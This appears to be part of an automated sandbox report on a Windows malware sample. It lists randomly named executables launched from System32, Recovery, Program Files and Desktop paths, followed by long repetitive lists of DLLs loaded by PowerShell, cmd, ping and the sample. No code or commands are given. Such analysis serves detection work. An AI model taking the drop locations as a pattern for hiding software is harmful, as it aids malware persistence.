Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown | Process created: C:\Windows\System32\r6Lr6XbTWt.exe "C:\Windows\System32\r6Lr6XbTWt.exe"
Source: unknown | Process created: C:\Recovery\0eDO5Zbs.exe "C:\Recovery\0eDO5Zbs.exe"
Source: unknown | Process created: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exe "C:\Program Files\Windows Portable Devices\mENvqiIeFx.exe"
Source: unknown | Process created: C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exe "C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exe"
Source: unknown | Process created: C:\Users\user\Desktop\VQdUvAQ4xO.exe "C:\Users\user\Desktop\VQdUvAQ4xO.exe"
Source: unknown | Process created: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe "C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe"
Source: unknown | Process created: C:\Windows\System32\r6Lr6XbTWt.exe "C:\Windows\System32\r6Lr6XbTWt.exe"
Source: unknown | Process created: C:\Recovery\0eDO5Zbs.exe "C:\Recovery\0eDO5Zbs.exe"
Source: unknown | Process created: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exe "C:\Program Files\Windows Portable Devices\mENvqiIeFx.exe"
Source: unknown | Process created: C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exe "C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exe"
Source: unknown | Process created: C:\Users\user\Desktop\VQdUvAQ4xO.exe "C:\Users\user\Desktop\VQdUvAQ4xO.exe"
Source: unknown | Process created: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe "C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe"
Source: unknown | Process created: C:\Windows\System32\r6Lr6XbTWt.exe "C:\Windows\System32\r6Lr6XbTWt.exe"
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Sections loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, sspicli.dll, ktmw32.dll, ntmarta.dll, wbemcomn.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, secur32.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, msasn1.dll, gpapi.dll, windowscodecs.dll, propsys.dll, dlnashext.dll, wpdshext.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Sections loaded: vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, version.dll, kernel.appcore.dll, mscoree.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Sections loaded: vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Sections loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, msasn1.dll, msisip.dll, gpapi.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
                              Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
                              Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll
                              Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll
                              Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll
                              Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll
                              Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll
                              Source: C:\Windows\System32\PING.EXE Section loaded: dnsapi.dll
                              Source: C:\Windows\System32\PING.EXE Section loaded: rasadhlp.dll
                              Source: C:\Windows\System32\PING.EXE Section loaded: fwpuclnt.dll
                              Source: C:\Windows\System32\PING.EXE Section loaded: winnsi.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: mscoree.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: apphelp.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: kernel.appcore.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: version.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: vcruntime140_clr0400.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: uxtheme.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: windows.storage.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: wldp.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: profapi.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: cryptsp.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: rsaenh.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: cryptbase.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: sspicli.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: ktmw32.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: propsys.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: edputil.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: urlmon.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: iertutil.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: srvcli.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: netutils.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: wintypes.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: appresolver.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: bcp47langs.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: slc.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: userenv.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: sppc.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: mpr.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: pcacli.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: sfc_os.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll
                              Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: mscoree.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: apphelp.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: kernel.appcore.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: version.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: vcruntime140_clr0400.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: uxtheme.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: windows.storage.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: wldp.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: profapi.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: cryptsp.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: rsaenh.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: cryptbase.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: sspicli.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: ktmw32.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: wbemcomn.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: amsi.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: userenv.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: iphlpapi.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: dnsapi.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: dhcpcsvc6.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: dhcpcsvc.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: winnsi.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: rasapi32.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: rasman.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: rtutils.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: mswsock.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: winhttp.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: ondemandconnroutehelper.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: rasadhlp.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: fwpuclnt.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: winmm.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: winmmbase.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: mmdevapi.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: devobj.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: ksuser.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: avrt.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: audioses.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: powrprof.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: umpdc.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: msacm32.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: midimap.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: dwrite.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: edputil.dll
